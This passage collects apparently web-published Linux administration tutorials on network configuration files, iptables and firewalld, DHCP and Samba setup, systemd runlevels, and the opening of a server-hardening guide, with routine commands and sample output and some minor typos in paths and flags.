This article covers the main TCP/IP network configuration files used by Linux to configure various network services of the system such as IP Address, Default Gateway, Name servers - DNS, hostname and much more.  Any Linux Administrator must be well aware where these services are configured and to use them. The good news is that most of the information provided on this article apply's to Redhat Fedora, Enterprise Linux, CentOS, Ubunto and other similar Linux distributions.

On most Linux systems, you can access the TCP/IP connection details within 'X Windows' from Applications > Others > Network Connections. The same may also be reached through Application > System Settings > Network > Configure. This opens up a window, which offers configuration of IP parameters for wired, wireless, mobile broadband, VPN and DSL connections:

linux-tcpip-config-1

The values entered here modify the files:

           /etc/sysconfig/network-scripts/ifcfg-eth0

           /etc/sysconfig/networking/devices/ifcfg-eth0

           /etc/resolv.conf

           /etc/hosts

The static host IP assignment is saved in /etc/hosts

The DNS server assignments are saved in the /etc/resolv.conf

IP assignments for all the devices found on the system are saved in the ifcfg-<interface> files mentioned above.

If you want to see all the IP assignments, you can run the command for interface configuration:

# ifconfig

Following is the output of the above command:

[root@gateway ~]# ifconfig

eth0    Link encap:Ethernet  HWaddr 00:0C:29:AB:21:3E
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feab:213e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1550249 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1401847 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:167592321 (159.8 MiB)  TX bytes:140584392 (134.0 MiB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:71833 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:12205495 (11.6 MiB)  TX bytes:12205495 (11.6 MiB)

The command ifconfig is used to configure a network interface. It can be used to set up the interface parameters that are used at boot time. If no arguments are given, the command ifconfig displays the status of the currently active interfaces. If you want to see the status of all interfaces, including those that are currently down, you can use the argument -a, as shown below:

# ifconfig -a

Fedora, Redhat Enterprise Linux, CentOS and other similar distributions supports user profiles as well, with different network settings for each user. The user profile and its parameters are set by the network-configuration tools. The relevant system files are placed in:

/etc/sysconfig/netwroking/profiles/profilename/

After boot-up, to switch to a specific profile you have to access a graphical tool, which will allow you to select from among the available profiles. You will have to run:

$ system-config-network

Or for activating the profile from the command line -

$ system-config-network-cmd -p <profilename> --activate

The Basic Commands for Networking

The basic commands used in Linux are common to every distro:

ifconfig - Configures and displays the IP parameters of a network interface

route - Used to set static routes and view the routing table

hostname - Necessary for viewing and setting the hostname of the system

netstat - Flexible command for viewing information about network statistics, current connections, listening ports

arp - Shows and manages the arp table

mii-tool - Used to set the interface parameters at data link layer (half/full duplex, interface speed, autonegotiation, etc.)

Many distro are now including the iproute2 tools with enhanced routing and networking tools:

ip - Multi-purpose command for viewing and setting TCP/IP parameters and routes.

tc - Traffic control command, used  for classifying, prioritizing, sharing, and limiting both inbound and outbound traffic.

Types of Network Interface

LO (local loop back interface). Local loopback interface is recognized only internal to the computer, the IP address is usually 127.0.0.1 or 127.0.0.2.

Ethernet cards are used to connect to the world external to the computer, usually named eth0, eth1, eth2 and so on.

Network interface files holding the configuration of LO and ethernet are:

           /etc/sysconfig/nework-scripts/ifcfg-lo

           /etc/sysconfig/nework-scripts/ifcfg-eth0

To see the contents of the files use the command:

# less /etc/sysconfig/network-scripts/ifcfg-lo

Which results in:

DEVICE=lo
IPADDR=127.0.0.1
NETMASK=255.0.0.0
NETWORK=127.0.0.0
# If you're having problems with gated making 127.0.0.0/8 a martian,
# you can change this to something else (255.255.255.255, for example)
BROADCAST=127.255.255.255
ONBOOT=yes
NAME=loopback

And the following:

# less /etc/sysconfig/network-scripts/ifcfg-eth0

Which gives the following results:

DEVICE="eth0"
NM_CONTROLLED="yes"
ONBOOT=yes
HWADDR=00:0C:29:52:A3:DB
TYPE=Ethernet
BOOTPROTO=none
IPADDR=192.168.1.18
PREFIX=24
GATEWAY=192.168.1.11
DNS1=8.8.8.8
DEFROUTE=yes
IPV4_FAILURE_FATAL=yes
IPV6INIT=no
NAME="System eth0"
UUID=5fb06bd0-0bb0-7ffb-45f1-d6edd65f3e03

 

Start and Stop the Network Interface Card

The ifconfig command can be used to start and stop network interface cards:

# ifconfig eth0 up
# ifconfig eth0 down

The ifup & ifdown command can also be used to start and stop network interface cards:

# ifup eth0
# ifdown eth0

The systemctl commands can also be used to enable, start, stop, restart and check the status of the network interface services -

# systemctl enable network.service
# systemctl start network.service
# systemctl stop network.service
# systemctl restart network.service
# systemctl status network.service

Displaying & Changing your System's Hostname

The command hostname displays the current hostname of the computer, which is 'Gateway':

# hostname
Gateway

You can change the hostname by giving the new name at the end of the command -

# hostname Firewall-cx

This will change to the new hostname once you have logged out and logged in again. In fact, for any change in the interfaces, the change is implemented only after the user logs in the next time after a log-out.

This concludes our Linux Network Configuration article.



  • Hits: 131961

Configuring Linux to Act as a Firewall - Linux IPTables Basics

What exactly is a firewall? As in the non-computer world, a firewall acts as a physical barrier to prevent fires from spreading. In the computer world too, the firewall acts in a similar manner, only the fires that they prevent from spreading are the attacks, which crackers generate when the computer is on the Internet. Therefore, a firewall can also be called a packet filter, which sits between the computer and the Internet, controlling and regulating the information flow.

Most of the firewalls in use today are the filtering firewalls. They sit between the computer and the Internet and limit access to only specific computers on the network. It can also be programmed to limit the type of communication, and selectively permit or deny several Internet services.

Organizations receive their routable IP addresses from their ISPs. However, the number of IP addresses given is limited. Therefore, alternate ways of sharing the Internet services have to be found without every node on the LAN getting a public IP address. This is done commonly by using private IP addresses, so that all nodes are able to access properly both external and internal network services.

Firewalls are used for receiving incoming transmissions from the Internet and routing the packets to the intended nodes on the LAN. Similarly, firewalls are also used for routing outgoing requests from a node on the LAN to the remote Internet service.

This method of forwarding the network traffic may prove to be dangerous, when modern cracking tools can spoof the internal IP addresses and allow the remote attacker to act as a node on the LAN. In order to prevent this, the iptables provide routing and forwarding policies, which can be implemented for preventing abnormal usage of networking resources. For example, the FORWARD chain lets the administrator control where the packets are routed within a LAN.

LAN nodes can communicate with each other, and they can accept the forwarded packets from the  firewall, with their internal IP addresses. However, this does not give them the facility to communicate to the external world and to the Internet.

For allowing the LAN nodes that have private IP addresses to communicate with the outside world, the firewall has to be configured for IP masquerading. The requests that LAN nodes make, are then masked with the IP addresses of the firewall’s external device, such as eth0.

How IPtables Can Be Used To Configure Your Firewall

Whenever a packet arrives at the firewall, it will be either processed or disregarded. The disregarded packets would normally be those, which are malformed in some way or are invalid in some technical way. Based on the packet activity of those that are processed, the packets are enqueued in one of the three builtin ‘tables.’ The first table is the mangle table. This alters the service bits in the TCP header. The second table is the filter queue, which takes care of the actual filtering of the packets. This consists of three chains, and you can place your firewall policy rules in these chains (shown in the diagram below):

- Forward chain: It filters the packets to be forwarded to networks protected by the firewall.

- Input chain: It filters the packets arriving at the firewall.

- Output chain: It filters the packets leaving the firewall.

The third table is the NAT table. This is where the Network Address Translation or NAT is performed. There are two built-in chains in this:

- Pre-routing chain: It NATs the packets whose destination address needs to be changed.

- Post-routing chain: It NATs the packets whose source address needs to be changed.

Whenever a rule is set, the table it belongs has to be specified. The ‘Filter’ table is the only exception. This is because most of the 'iptables’ rules are the filter rules. Therefore, the filter table is the default table.

The diagram below shows the flow of packets within the filter table. Packets entering the Linux system follow a specific logical path and decisions are made backed on their characteristics.  The path shown below is independent of the network interface they are entering or exiting:

The Filter Queue Table

linux-ip-filter-table

Each of the chains filters data packets based on:

  • Source and Destination IP Address
  • Source and Destination Port number
  • Network interface (eth0, eth1 etc)
  • State of the packet 

Target for the rule: ACCEPT, DROP, REJECT, QUEUE, RETURN and LOG

As mentioned previously, the table of NAT rules consists mainly of two chains: each rule is examined in order until one matches. The two chains are called PREROUTING (for Destination NAT, as packets first come in), and POSTROUTING (for Source NAT, as packets leave).

The NAT Table

linux-nat-table

At each of the points above, when a packet passes we look up what connection it is associated with. If it's a new connection, we look up the corresponding chain in the NAT table to see what to do with it. The answer it gives will apply to all future packets on that connection.

The most important option here is the table selection option, `-t'. For all NAT operations, you will want to use `-t nat' for the NAT table. The second most important option to use is `-A' to append a new rule at the end of the chain (e.g. `-A POSTROUTING'), or `-I' to insert one at the beginning (e.g. `-I PREROUTING').

The following command enables NAT for all outgoing packets. Eth0 is our WAN interface:

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

 If you rather implement static NAT, mapping an internal host to a public IP, here's what the command would look like:

# iptables -A POSTROUTING -t nat -s 192.168.0.3 -o eth0 -d 0/0 -j SNAT --to 203.18.45.12

With the above command, all outgoing packets sent from internal IP 192.168.0.3 are mapped to external IP 203.18.45.12.

Taking it the other way around, the command below is used to enable port forwarding from the WAN interface, to an internal host. Any incoming packets on our external interface (eth0) with a destination port (dport) of 80, are forwarded to an internal host (192.168.0.5), port 80:

# iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 80 -j DNAT --to 192.168.0.5:80

How The FORWARD Chain Allows Packet Forwarding

Packet forwarding within a LAN is controlled by the FORWARD chain in the iptables firewall. If the firewall is assigned an internal IP address eth2 and an external IP address on eth0,  the rules to be used to allow the forwarding to be done for the entire LAN would be:

# iptables -A FORWARD -i eth2 -j ACCEPT
# iptables -A FORWARD -o eth0 -j ACCEPT

This way, Firewall gets access to the nodes of the LAN that have internal IP address. The packets enter through the eth2 device of the gateway. They are then routed from one LAN node to their intended destination nodes.

Dynamic Firewall

By default, the IPv4 policy in Fedora kernels disables support for IP forwarding. This prevents machines that run Fedora from functioning as a dedicated firewall. Furthermore, starting with Fedora 16, the default firewall solution is now provided by “firewalld”. Although it is claimed to be the default, Fedora 16 still ships with the traditional firewall iptables. To enable the dynamic firewall in Fedora, you will need to disable the traditional firewall and install the new dynamic firewalld. The main difference between the two is firewalld is smarter in the sense it does not have to be stopped and restarted each time a policy decision is changed, unlike the traditional firewall.

To disable the traditional firewall, there are two methods, graphical and command line. For the graphical method, the GUI for the System-Config- Firewall can be opened from the Applications menu > Other > Firewall. The firewall can now be disabled. 

For the command line, following commands will be needed:

# systemctl stop iptables.service
# systemctl stop ip6tables.service

To remove iptables entirely from system:

# systemctl disable iptables.service

rm '/etc/systemd/system/basic.target.wants/iptables.service'

# systemctl disable ip6tables.service

rm '/etc/systemd/system/basic.target.wants/ip6tables.service'

For installing Firewalld, you can use Yum:

# yum install firewalld firewall-applet

To enable and then start Firewalld you will need the following commands:

# systemctl enable firewalld.service
# systemctl start firewalld.service

The firewall-applet can be started from Applications menu > Other > Firewall Applet

When you hover the mouse over the firewall applet on the top panel, you can see the ports, services, etc. that are enabled. By clicking on the applet, the different services can be started or stopped. However, if you change the status and the applet crashes in order to regain control, you will have to kill the applet by using the following commands:

# ps -A | grep firewall*

Which will tell you the PID of the running applet, and you can kill it with the following command:

# kill -9 <pid>

A restart of the applet can be done from the Applications menu, and now the service you had enabled will be visible.

To get around this, the command line option can be used:

Use firewall-cmd to enable, for example ssh: 

# firewall-cmd --enable --service=ssh

Enable samba for 10 seconds: Enable samba for 10 seconds:

# firewall-cmd --enable --service=samba --timeout=10

Enable ipp-client:

# firewall-cmd --enable --service=ipp-client

Disable ipp-client:

# firewall-cmd --disable --service=ipp-client

To restore the static firewall with lokkit again simply use (after stopping and disabling Firewalld):

# lokkit --enabled

  • Hits: 34287

Installation and Configuration of Linux DHCP Server

For a cable modem or a DSL connection, the service provider dynamically assigns the IP address to your PC. When you install a DSL or a home cable router between your home network and your modem, your PC will get its IP address from the home router during boot up. A Linux system can be set up as a DHCP server and used in place of the router.

DHCP is not installed by default on your Linux system. It has to be installed by gaining root privileges:

$ su -

You will be prompted for the root password and you can install DHCP by the command:

# yum install dhcp

Once all the dependencies are satisfied, the installation will complete.

Start the DHCP Server

You will need root privileges for enabling, starting, stopping or restarting the dhcpd service:

# systemctl enable dhcpd.service

Once enabled, the dhcpd services can be started, stopped and restarted with:

# systemctl start dhcpd.service
# systemctl stop dhcpd.service
# systemctl restart dhcpd.service

or with the use of the following commands if systemctl command is not available:

# service dhcpd start
# service dhcpd stop
# service dhcpd restart

To determine whether dhcpd is running on your system, you can seek its status:

# systemctl status dhcpd.service

Another way of knowing if dhcpd is running is to use the 'service' command:

# service dhcpd status

Note that dhcpd has to be configured to start automatically on next reboot.

Configuring the Linux DHCP Server

Depending on the version of the Linux installation you are currently running, the configuration file may reside either in /etc/dhcpd or /etc/dhcpd3 directories.

When you install the DHCP package, a skeleton configuration file and a sample configuration file are created. Both are quite extensive, and the skeleton configuration file has most of its commands deactivated with # at the beginning. The sample configuration file can be found in the location /usr/share/doc/dhcp*/dhcpd.conf.sample.

When the dhcpd.conf file is created, a subnet section is generated for each of the interfaces present on your Linux system; this is very important. Following is a small part of the dhcp.conf file:

ddns-update-style interim

ignore client-updates

subnet 192.168.1.0 netmask 255.255.255.0 {

   # The range of IP addresses the server

   # will issue to DHCP enabled PC clients

   # booting up on the network

   range 192.168.1.201 192.168.1.220;

   # Set the amount of time in seconds that

   # a client may keep the IP address

  default-lease-time 86400;

  max-lease-time 86400;

   # Set the default gateway to be used by

   # the PC clients

   option routers 192.168.1.1;

   # Don't forward DHCP requests from this

   # NIC interface to any other NIC

   # interfaces

   option ip-forwarding off;

   # Set the broadcast address and subnet mask

   # to be used by the DHCP clients

  option broadcast-address 192.168.1.255;

  option subnet-mask 255.255.255.0;

   # Set the NTP server to be used by the

   # DHCP clients

  option ntp-servers 192.168.1.100;

   # Set the DNS server to be used by the

   # DHCP clients

  option domain-name-servers 192.168.1.100;

   # If you specify a WINS server for your Windows clients,

   # you need to include the following option in the dhcpd.conf file:

  option netbios-name-servers 192.168.1.100;

   # You can also assign specific IP addresses based on the clients'

   # ethernet MAC address as follows (Host's name is "laser-printer":

  host laser-printer {

      hardware ethernet 08:00:2b:4c:59:23;

     fixed-address 192.168.1.222;

   }

}

#

# List an unused interface here

#

subnet 192.168.2.0 netmask 255.255.255.0 {

}

The IP addresses will need to be changed to meet the ranges suitable to your network. There are other option statements that can be used to configure the DHCP. As you can see, some of the resources such as printers, which need fixed IP addresses, are given the specific IP address based on the NIC MAC address of the device.

For more information, you may read the relevant man pages:

# man dhcp-options

Routing with a DHCP Server

When a PC with DHCP configuration boots, it requests for the IP address from the DHCP server. For this, it sends a standard DHCP request packet to the DHCP server with a source IP address of 255.255.255.255. A route has to be added to this 255.255.255.255 address so that the DHCP server knows on which interface it has to send the reply. This is done by adding the route information to the /etc/sysconfig/network-scripts/route-eth0 file, assuming the route is to be added to the eth0 interface:

#
# File /etc/sysconfig/network-scripts/route-eth0
#
255.255.255.255/32 dev eth0

After defining the interface for the DHCP routing, it has to be further ensured that your DHCP server listens only to that interface and to no other. For this the /etc/sysconfig/dhcpd file has to be edited and the preferred interface added to the DHCPDARGS variable. If the interface is to be eth0 following are the changes that need to be made:

# File: /etc/sysconfig/dhcpd

DHCPDARGS=eth0

Testing the DHCP

Using the netstat command along with the -au option will show the list of interfaces listening on the bootp or DHCP UDP port:

# netstat -au  | grep bootp

will result in the following:

udp     0         0 192.168.1.100:bootps         *:*

Additionally, a check on the /var/log/messages file will show the defined interfaces used from the time the dhcpd daemon was started:

Feb  24 17:22:44 Linux-64 dhcpd: Listening on LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24
Feb  24 17:22:44 Linux-64 dhcpd: Sending on  LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24

This confirms the DHCP Service has been installed with success and operating correctly.

  • Hits: 75177

Configuring Linux Samba (SMB) - How to Setup Samba (Linux Windows File Sharing)

Resource sharing, like file systems and printers, in Microsoft Windows systems, is accomplished using a protocol called the Server Message Block or SMB. For working with such shared resources over a network consisting of Windows systems, an RHEL system must support SMB. The technology used for this is called SAMBA. This provides integration between the Windows and Linux systems. In addition, this is used to provide folder sharing between Linux systems. There are two parts to SAMBA, a Samba Server and a Samba Client.

When an RHEL system accesses resources on a Windows system, it does so using the Samba Client. An RHEL system, by default, has the Samba Client installed.

When an RHEL system serves resources to a Windows system, it uses the package Samba Server or simply Samba. This is not installed by default and has to be exclusively set up.

Installing SAMBA on Linux Redhat/CentOS

Whether Samba is already installed on your RHEL, Fedora or CentOS setup, it can be tested with the following command:"

$ rpm -q samba

The result could be - “package samba is not installed,” or something like “samba-3.5.4-68.el6_0.1.x86_64” showing the version of Samba present on the system.

To install Samba, you will need to become root with the following command (give the root password, when prompted):

$ su -       

Then use Yum to install the Linux Samba package:

# yum install samba

This will install the samba package and its dependency package, samba-common.

Before you begin to use or configure Samba, the Linux Firewall (iptables) has to be configured to allow Samba traffic. From the command-line, this is achieved with the use of the following command:

# firewall-cmd --enable --service=samba

Configuring Linux SAMBA

The Samba configuration is meant to join an RHEL, Fedora or CentOS system to a Windows Workgroup and setting up a directory on the RHEL system, to act as a shared resource that can be accessed by authenticated Windows users.

To start with, you must gain root privileges with (give the root password, when prompted):

$ su -     

Edit the Samba configuration file:

# vi /etc/samba/smb.conf

The smb.conf [Global] Section

An smb.conf file is divided into several sections. the [global] section, which is the first section, has settings that apply to the entire Samba configuration. However, settings in the other sections in the configuration file may override the global settings.

To begin with, set the workgroup, which by default is set as “MYGROUP”:

workgroup = MYGROUP

Since most Windows networks are named WORKGROUP by default, the settings have to be changed as:

workgroup = workgroup

Configure the Shared Resource

In the next step, a shared resource that will be accessible from the other systems on the Windows network has to be configured. This section has to be given a name by which it will be referred to when shared. For our example, let’s assume you would like share a directory on your Linux system located at /data/network-applications.  You’ll need to entitle the entire section as [NetApps] as shown below in our smb.conf file:

[NetApps]       

path = /data/network-applications

writeable = yes

browseable = yes

valid users = administrator

 When a Windows user browses to the Linux Server, they’ll see a network share labeled

NetApps”.

This concludes the changes to the Samba configuration file.

Create a Samba User

Any user wanting to access any Samba shared resource must be configured as a Samba User and assigned a password. This is achieved using the smbpasswd  command as a root user. Since you have defined “administrator” as the user who is entitled to access the “/data/network-applications” directory of the RHEL system, you have to add “administrator” as a Samba user.

You must gain root privileges with the following command (give the root password, when prompted):

$ su -

Add “administrator” as a Windows user -

# smbpasswd -a administrator

The system will respond with

New SMB password: <Enter password>
Retype new SMB password: <Retype password>

This will result into the following message:

Added user administrator

It will also be necessary to add the same account as a simple linux user, using the same password we used for the samba user:

# adduser administrator
# passwd administrator
Changing password for user administrator
New UNIX password: ********
Retype new UNIX password: ********
passwd: all authentication tokens updated successfully.
Now it is time to test the samba configuration file for any errors. For this you can use the command line tool “testparm” as root:
# testparm
Load smb config files from /etc/samba/smb.conf

Rlimit_max: rlimit_max (1024) below minimum Windows limit (16384)

Processing section “[NetApps]”

Loaded services file OK.

Server role: ROLE_STANDALONE

Press enter to see a dump of your service definitions

If you would like to ensure that Windows users are automatically authenticated to your Samba share, without prompting for a username/password, all that’s needed is to add the samba user and password exactly as you Windows clients usernames and password. When a Windows system accesses a Samba share, it will automatically try to log in using the same credentials as the user logged into the Windows system.

Starting Samba and NetBios Name Service on RHEL

The Samba and NetBios Nameservice or NMB services have to be enabled and then started for them to take effect:

# systemctl enable smb.service
# systemctl start smb.service
# systemctl enable nmb.service
# systemctl start nmb.service

In case the services were already running, you may have to restart them again:

# systemctl restart smb.service
# systemctl restart nmb.service

If you are not using systemctl command, you can alternatively start the Samba using a more classic way:

[root@gateway] service smb start
Starting SMB services:  [OK]

To configure your Linux system to automatically start the Samba service upon boot up, the above command will need to be inserted in the /etc/rc.local file. For more information about this, you can read our popular Linux Init Process & Different run levels article

Accessing the Samba Shares From Windows                               

Now that you have configured the Samba resources and the services are running, they can be tested for sharing from a Windows system. For this, open the Windows Explorer and navigate to the Network page. Windows should show the RHEL system. If you double-click on the RHEL icon, you will be prompted for the username and password. The username to be entered now is “administrator” with the password that was assigned. 

Again, if you are logged on your Windows workstation using the same account and password as that of the Samba service (e.g Administrator), you will not be prompted for any authentication as the Windows  operating system will automatically authenticate to the RHEL Samba service using these credentials.

Accessing Windows Shares From RHEL Workstation or Server

To access Windows shares from your RHEL system, the package samba-client may have to be installed, unless it is installed by default. For this you must gain root privileges with (give the root password, when prompted):

$ su -  

Install samba-client using the following commands:

# yum install samba-client

To see any shared resource on the Windows system and to access it, you can go to Places > Network. Clicking on the Windows Network icon will open up the list of workgroups available for access.

  • Hits: 337560

Understanding The Linux Init Process & Different RunLevels

Different Linux systems can be used in many ways. This is the main idea behind operating different services at different operating levels. For example, the Graphical User Interface can only be run if the system is running the X-server; multiuser operation is only possible if the system is in a multiuser state or mode, such as having networking available. These are the higher states of the system, and sometimes you may want to operate at a lower level, say, in the single user mode or the command line mode.

Such levels are important for different operations, such as for fixing file or disk corruption problems, or for the server to operate in a run level where the X-session is not required. In such cases having services running that depend on higher levels of operation, makes no sense, since they will hamper the operation of the entire system.

Each service is assigned to start whenever its run level is reached. Therefore, when you ensure the startup process is orderly, and you change the mode of the machine, you do not need to bother about which service to manually start or stop.

The main run-levels that a system could use are:

RunLevel

Target

Notes

0

runlevel0.target, poweroff.target

Halt the system

1

runlevel1.target,  rescue.target

Single user mode

2, 4

runlevel2.target, runlevel4.target, multi-user.target

User-defined/Site-specific runlevels. By default, identical to 3

3

runlevel3.target,multi-user.target

Multi-user, non-graphical. Users can usually login via multiple consoles or via the network.

5

runlevel5.target, graphical.target

Multi-user, graphical. Usually has all the services of runlevel3 plus a graphical login - X11

6

runlevel6.target, reboot.target

Reboot

Emergency

emergency.target

Emergency shell

The system and service manager for Linux is now “systemd”. It provides a concept of “targets”, as in the table above. Although targets serve a similar purpose as runlevels, they act somewhat differently. Each target has a name instead of a number and serves a specific purpose. Some targets may be implemented after inheriting all the services of another target and adding more services to it.

Backward compatibility exists, so switching targets using familiar telinit RUNLEVEL command still works. On Fedora installs, runlevels 0, 1, 3, 5 and 6 have an exact mapping with specific systemd targets. However, user-defined runlevels such as 2 and 4 are not mapped that way. They are treated similar to runlevel 3, by default.

For using the user-defined levels 2 and 4, new systemd targets have to be defined that makes use of one of the existing runlevels as a base. Services that you want to enable have to be symlinked into that directory.

The most commonly used runlevels in a currently running linux box are 3 and 5. You can change runlevels in many ways.

A runlevel of 5 will take you to GUI enabled login prompt interface and desktop operations. Normally by default installation, this would take your to GNOME or KDE linux environment. A runlevel of 3 would boot your linux box to terminal mode (non-X) linux box and drop you to a terminal login prompt. Runlevels 0 and 6 are runlevels for halting or rebooting your linux respectively.

Although compatible with SysV and LSB init scripts, systemd:

  • Provides aggressive parallelization capabilities.
  • Offers on-demand starting of daemons.
  • Uses socket and D-Bus activation for starting services.
  • Keeps track of processes using Linux cgroups.
  • Maintains mount and automount points.
  • Supports snapshotting and restoring of the system state.
  • Implements an elaborate transactional dependency-based service control logic.

Systemd starts up and supervises the entire operation of the system. It is based on the notion of units. These are composed of a name, and a type as shown in the table above. There is a matching configuration file with the same name and type. For example, a unit avahi.service will have a configuration file with an identical name, and will be a unit that encapsulates the Avahi daemon. There are seven different types of units, namely, service, socket, device, mount, automount, target, and snapshot.

To introspect and or control the state of the system and service manager under systemd, the main tool or command is “systemctl”. When booting up, systemd activates the default.target. The job of the default.target is to activate the different services and other units by considering their dependencies. The ‘system.unit=’ command line option parses arguments to the kernel to override the unit to be activated. For example,

systemd.unit=rescue.target is a special target unit for setting up the base system and a rescue shell (similar to run level 1);

systemd.unit=emergency.target, is very similar to passing init=/bin/sh but with the option to boot the full system from there;

systemd.unit=multi-user.target for setting up a non-graphical multi-user system;

systemd.unit=graphical.target for setting up a graphical login screen.

How to Enable/Disable Linux Services

Following are the commands used to enable or disable services in CentOS, Redhat Enterprise Linux and Fedora systems:

Activate a service immediately e.g postfix:

[root@gateway ~]# service postfix start
Starting postfix: [  OK  ]

To deactivate a service immediately e.g postfix:

[root@gateway ~]# service postfix stop
Shutting down postfix: [  OK  ]

To restart a service immediately e.g postfix:

[root@gateway ~]# service postfix restart
Shutting down postfix: [FAILED]
Starting postfix: [  OK  ]

You might have noticed the 'FAILED' message. This is normal behavior as we shut down the postfix service with our first command (service postfix stop), so shutting it down a second time would naturally fail!

Determine Which Linux Services are Enabled at Boot

The first column of this output is the name of a service which is currently enabled at boot. Review each listed service to determine whether it can be disabled.

 If it is appropriate to disable a service , do so using the command:

[root@gateway ~]# chkconfig -level servicename off

Run the following command to obtain a list of all services programmed to run in the different Run Levels of your system:

[root@gateway ~]#  chkconfig --list | grep :on

NetworkManager  0:off   1:off   2:on    3:on    4:on    5:on    6:off
abrtd           0:off   1:off   2:off   3:on    4:off   5:on    6:off
acpid           0:off   1:off   2:on    3:on    4:on    5:on    6:off
atd             0:off   1:off   2:off   3:on    4:on    5:on    6:off
auditd          0:off   1:off   2:on    3:on    4:on    5:on    6:off
autofs          0:off   1:off   2:off   3:on    4:on    5:on    6:off
avahi-daemon    0:off   1:off   2:off   3:on    4:on    5:on    6:off
cpuspeed        0:off   1:on    2:on    3:on    4:on    5:on    6:off
crond           0:off   1:off   2:on    3:on    4:on    5:on    6:off
cups            0:off   1:off   2:on    3:on    4:on    5:on    6:off
haldaemon       0:off   1:off   2:off   3:on    4:on    5:on    6:off
httpd           0:off   1:off   2:off   3:on    4:off   5:off   6:off
ip6tables       0:off   1:off   2:on    3:on    4:on    5:on    6:off
iptables        0:off   1:off   2:on    3:on    4:on    5:on    6:off
irqbalance      0:off   1:off   2:off   3:on    4:on    5:on    6:off

Several of these services are required, but several others might not serve any purpose in your environment, and use CPU and memory resources that would be better allocated to applications. Assuming you don't RPC services, autofs or NFS, they can be disabled for all Run Levels using the following commands:

[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 nfslock off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 netfs off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 rpcgssd off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 rpcidmapd off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 autofs off

How to Change Runlevels

You can switch to runlevel 3 by running:    

[root@gateway ~]# systemctl isolate multi-user.target

(or)

[root@gateway ~]# systemctl isolate runlevel3.target

You can switch to runlevel 5 by running:    

[root@gateway ~]# systemctl isolate graphical.target

(or)

[root@gateway ~]# systemctl isolate runlevel5.target

How to Change the Default Runlevel Using Systemd

The systemd uses symlinks to point to the default runlevel. You have to delete the existing symlink first, before you can create a new one:
 
[root@gateway ~]# rm /etc/systemd/system/default.target

Switch to runlevel 3 by default:

[root@gateway ~]# ln -sf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target  Switch to runlevel 5 by default:    

[root@gateway ~]# ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

 And just in case you were wondering, systemd does not use the classic /etc/inittab file!

How to Change The Default Runlevel Using The Inittab File

There's the Systemd way and of course, the Inittab way. In this case, Runlevels are represented by /etc/inittab text file. The default runlevel is always specified from /etc/inittab text file.

To change the default runlevel in fedora ,edit /etc/inittab and find the line that looks like this:  id:5:initdefault:

The number 5 represents a runlevel with X enabled (GNOME/KDE mostly). If you want to change to runlevel 3, simply change this

id:5:initdefault:to this

id:3:initdefault:Save and reboot your linux box. Your linux box would now reboot on runlevel 3, a runlevel without X or GUI. Avoid changing the default /etc/iniittab runlevel value to 0 or 6 .

Users having difficulty with Linux editors can also read our article on how to use Vi, the popular Linux editor: Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features.

RunLevel    Target    Notes
0    runlevel0.target, poweroff.target     Halt the system.
1, s, single    runlevel1.target, rescue.target     Single user mode.
2, 4    runlevel2.target, runlevel4.target, multi-user.target    User-defined/Site-specific runlevels. By default, identical to 3.
3    runlevel3.target, multi-user.target     Multi-user, non-graphical. Users can usually login via multiple consoles or via the network.
5    runlevel5.target, graphical.target     Multi-user, graphical. Usually has all the services of runlevel 3 plus a graphical login.
6    runlevel6.target, reboot.target     Reboot
Emergency    emergency.target     Emergency shell
  • Hits: 64762

How To Secure Your Linux Server or Workstation - Linux Best Security Practices

Below are some of the most common recommendations and method to effectively secure a Linux Server or Workstation.

Boot Disk

One of the foremost requisites of a secure Linux server is the boot disk. Nowadays, this has become rather simple as most Linux distributions are on bootable CD/DVD/USB sticks. Other options are, to use rescue disks such as the ‘TestDisk’, ‘SystemRescueCD’, ‘Trinity Rescue Kit’ or ‘Ubuntu Rescue Remix’. These will enable you to gain access to your system, if you are unable to gain entry, and also to recover files and partitions if your system is damaged. They can be used to check for virus attacks and to detect rootkits.

Next requirement is for patching your system. Distributions issue notices for security updates, and you can download and patch your system using these updates. RPM users can use the ‘up2date’ command, which automatically resolves dependencies, rather than the other rpm commands, since these only report dependencies and do not help to resolve them.

Patch Your System

While RedHat/CentOS/Fedora users can patch their systems with a single command, 'yum update',   Debian users can patch their systems with the ‘sudo apt-get update’ command, which will update the sources list. This should be followed by the command ‘sudo apt-get upgrade’, which will install the newest version of all packages on the machine, resolving all the dependencies automatically.

New vulnerabilities are being discovered all the time, and patches follow. One way to learn about new vulnerabilities is to subscribe to the mailing list of the distribution used.

Disable Unnecessary Services

Your system becomes increasingly insecure as you operate more services, since every service has its own security issues. For improving the overall system performance and for enhancing security, it is important to detect and eliminate unnecessary running services. To know which services are currently running on your system, you can use commands like:

[root@gateway~]# ps aux            


Following is an example output of the above command:

[root@gateway~]# ps aux
USER       PID   %CPU   %MEM    VSZ    RSS  TTY  STAT START   TIME COMMAND
